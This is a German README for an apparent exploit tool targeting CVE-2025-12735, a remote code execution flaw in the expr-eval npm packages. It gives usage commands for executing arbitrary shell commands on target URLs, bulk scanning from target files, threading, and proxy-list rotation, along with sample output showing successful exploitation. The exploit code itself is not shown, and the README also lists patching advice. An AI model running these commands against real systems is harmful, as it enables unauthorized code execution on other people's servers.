
Sicherheitsforschungswerkzeug zur Erkennung und Prüfung von CVE-2025-12735 (expr-eval RCE-Sicherheitslücke)
Ein Sicherheitsforschungswerkzeug zur Erkennung und Prüfung der CVE-2025-12735-Schwachstelle in den npm-Paketen expr-eval und expr-eval-fork.
Dieses Werkzeug ist ausschließlich für autorisierte Sicherheitstests und Bildungszwecke bestimmt. Nicht autorisierter Zugriff auf Computersysteme ist illegal. Verwenden Sie dieses Tool nur auf Systemen, die Sie besitzen oder für die Sie eine ausdrückliche schriftliche Erlaubnis zum Testen haben.
CVE-2025-12735 ist eine kritische Schwachstelle für Remotecodeausführung (Remote Code Execution) in den npm-Paketen expr-eval und expr-eval-fork. Diese Schwachstelle ermöglicht es Angreifern, willkürliche Funktionen innerhalb des vom Parser verwendeten context-Objekts zu definieren, wodurch schädlicher Code eingeschleust werden kann, der systemweite Befehle ausführt.
CVSS-Score: 9.8 (Kritisch) expr-eval-fork < 3.0.0 expr-eval-fork v3.0.0+
# Clone the repository
git clone https://github.com/AN5I/cve-2025-12735-expr-eval-rce.git
cd cve-2025-12735-expr-eval-rce
# Install dependencies
pip install -r requirements.txt
# Make script executable (optional)
chmod +x uknf_cve_2025_12735_expr_eval_rce.py
# Download the script
wget https://raw.githubusercontent.com/AN5I/cve-2025-12735-expr-eval-rce/main/uknf_cve_2025_12735_expr_eval_rce.py
# Install dependencies
pip install requests
# Single target
python3 uknf_cve_2025_12735_expr_eval_rce.py -u http://target.com
# Execute custom command
python3 uknf_cve_2025_12735_expr_eval_rce.py -u http://target.com -c "whoami"
# Multiple targets from file
python3 uknf_cve_2025_12735_expr_eval_rce.py -f targets.txt -o results.json
# With threading for faster scanning
python3 uknf_cve_2025_12735_expr_eval_rce.py -u http://target.com -t 5
# Verbose output for debugging
python3 uknf_cve_2025_12735_expr_eval_rce.py -u http://target.com -v
# Single proxy
python3 uknf_cve_2025_12735_expr_eval_rce.py -u http://target.com --proxy http://proxy:port
# Multiple proxies from file
python3 uknf_cve_2025_12735_expr_eval_rce.py -f targets.txt --proxy-list proxies.txt
-u, --url Ziel-URL
-f, --file Datei mit Ziel-URLs (eine pro Zeile)
-c, --command Auszuführender Befehl (Standard: id)
-t, --threads Anzahl der Threads (Standard: 1)
-o, --output Ausgabedatei (Standard: uknf_expr_eval_results.json)
-v, --verbose Ausführliche Protokollierung aktivieren
--proxy Proxy-URL (z.B. http://127.0.0.1:8080)
--proxy-list Datei mit Proxy-URLs (eine pro Zeile)
Das Skript erzeugt eine JSON-Datei mit detaillierten Ergebnissen:
{
"target": "http://target.com",
"timestamp": "2025-11-20T15:35:32.638109",
"expr_eval_detected": true,
"vulnerable": true,
"endpoint_found": true,
"exploitation_successful": true,
"command_executed": "id",
"output": "uid=1000(user) gid=1000(user)...",
"vulnerable_endpoint": "/api/evaluate"
}
Falls Sie expr-eval oder expr-eval-fork verwenden:
Sofort aktualisieren:
npm install expr-eval-fork@latest
Sicherheitspatch anwenden:
Eingabevalidierung implementieren:
python3 uknf_cve_2025_12735_expr_eval_rce.py -u https://example.com
# Create targets file
echo "https://target1.com" > targets.txt
echo "https://target2.com" >> targets.txt
# Run scan
python3 uknf_cve_2025_12735_expr_eval_rce.py -f targets.txt -o results.json
python3 uknf_cve_2025_12735_expr_eval_rce.py -u https://example.com -c "uname -a"
# Single proxy
python3 uknf_cve_2025_12735_expr_eval_rce.py -u https://example.com --proxy http://127.0.0.1:8080
# Multiple proxies from file
echo "http://proxy1:8080" > proxies.txt
echo "http://proxy2:8080" >> proxies.txt
python3 uknf_cve_2025_12735_expr_eval_rce.py -f targets.txt --proxy-list proxies.txt
Beiträge sind willkommen! Bitte zögern Sie nicht, einen Pull Request einzureichen.
git checkout -b feature/AmazingFeature)git commit -m 'Add some AmazingFeature')git push origin feature/AmazingFeature)Falls Sie auf Probleme stoßen oder Vorschläge haben, öffnen Sie bitte ein Issue auf GitHub.
Dieses Projekt ist unter der MIT-Lizenz lizenziert – siehe die Datei LICENSE für Details.
Wenn Sie dieses Tool nützlich finden, erwägen Sie bitte, ihm auf GitHub einen Stern zu geben!
Dieses Tool wird ausschließlich für Bildungs- und autorisierte Sicherheitstestzwecke bereitgestellt. Die Autoren sind nicht verantwortlich für Missbrauch oder Schäden, die durch dieses Programm verursacht werden. Die Benutzer sind dafür verantwortlich, sicherzustellen, dass sie vor dem Testen von Systemen über die entsprechende Autorisierung verfügen.
Wenn Sie dieses Tool nützlich finden und das Projekt unterstützen möchten:
Bitcoin (BTC):
bc1qj95y35w8r2mw0u28zrm3dmxtzjkq258xdv8tzv
Ethereum (ETH):
0x3DC302a3f35F6cD1A03FF4982EcE0dE8fE1cEba7
Vielen Dank für Ihre Unterstützung! 🙏